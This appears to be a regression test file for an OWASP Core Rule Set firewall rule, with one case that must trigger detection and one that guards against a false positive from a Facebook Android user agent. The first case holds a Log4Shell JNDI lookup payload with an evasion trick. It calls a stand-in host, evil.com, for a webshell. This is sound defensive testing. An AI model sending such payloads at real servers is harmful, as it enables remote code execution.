---
meta:
  author: "dune73, Max Leske, azurit"
rule_id: 932131
tests:
  - test_id: 1
    desc: Log4J test with evasion
    stages:
      - input:
          dest_addr: "127.0.0.1"
          headers:
            Accept: "*/*"
            User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}"
            Host: "localhost"
          method: "GET"
          port: 80
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [932131]
  - test_id: 2
    desc: False positive against Facebook for Android user agent
    stages:
      - input:
          dest_addr: "127.0.0.1"
          headers:
            Accept: "*/*"
            User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]"
            Host: "localhost"
          method: "GET"
          port: 80
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [932131]
